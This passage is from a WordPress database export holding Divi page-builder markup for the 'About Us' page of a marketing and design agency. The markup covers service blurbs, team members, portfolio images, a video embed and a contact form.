admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"56px||56px|||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"56px|0px|56px|0px|false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>With the advent to this digital era, <strong>Unique traffic to your website</strong>, is becoming the key battle point. Targeting the appropriate TG and reaching to them at the right place and the moment can help you earn them for lifetime.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||56px||false|false\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"4.5.2\" custom_padding=\"56px||56px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We do not fear trying new stuff and failure (we say learning). Meet the <span>team of professionals enjoying their work and adding value to your project.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\" hover_enabled=\"0\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Dhiraj Kumar\" position=\"Founder\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-6-1.jpg\" linkedin_url=\"https://www.linkedin.com/in/dhirajwth\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" hover_enabled=\"0\" alt=\"Dhiraj\" title_text=\"Founder WhatTheHell?\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Shubham Jha\" position=\"Marketing Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-2.jpg\" facebook_url=\"#\" linkedin_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Shubham\" title_text=\"Artboard (2)\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Sachin\" position=\"Art Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-7.jpg\" facebook_url=\"#\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" hover_enabled=\"0\" locked=\"off\" alt=\"Sachin\" title_text=\"Art Director WhatTheHell?\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||56px|||\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"56px||56px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" _module_preset=\"default\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-08 20:57:57','2020-08-08 20:57:57','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/08/392-revision-v1/',0,'revision','',0),(737,1,'2020-08-08 20:58:07','2020-08-08 20:58:07','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" parallax=\"on\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Build Brand Equity</h2>\n<p>Our advertising and marketing startegies are aligned towards the core objectives of the business operation of sustainable sales leading to profit and building brand equity as long term asset creation for the businesses.</p>\n<p><span style=\"font-size: 16px;\">There is a need to understand the various phases of businesses &amp; invest in marketing (Sales or Brand Building) in the required proportion. As per the budget of the business we can align our marketing and advertising strategies into aggressive disruptive to guerilla or safe. As the successful advertising and marketing require patience and balancing various market forces to help your business thrust to an upward direction.</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" 